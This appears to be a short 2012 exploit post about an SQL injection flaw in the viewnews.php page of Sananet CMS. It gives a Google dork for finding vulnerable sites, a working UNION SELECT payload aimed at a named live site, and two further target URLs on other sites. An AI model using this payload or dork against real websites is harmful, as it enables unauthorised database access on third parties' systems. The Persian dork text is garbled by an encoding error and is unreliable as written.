Home / exploits Sananet CMS SQL Injection
Posted on 10 August 2012
# Exploit Title: sananet cms sql injection # Google Dork:intext :طراØÙŠ Ùˆ راÙ‡ اÙ†دازÙŠ از طراØاÙ† سÙ†ا Ù†ت inurl:viewnews.php?id= # Date: 08/09/2012 # Author: Crim3R # Cms Creator home : http://www.sana-net.ir/ # Version: - # Tested on: all ======================================== there is sql injection in viewnews.php D3M0 : http://maraghefair.com/viewnews.php?id=-120+union+all+select+1,@@version,3,4,5,6-- http://www.takdivx.net/viewnews.php?id=101 http://www.behtarinhamsar.com/viewnews.php?id=112 ===============Crim3R@Att.Net===========
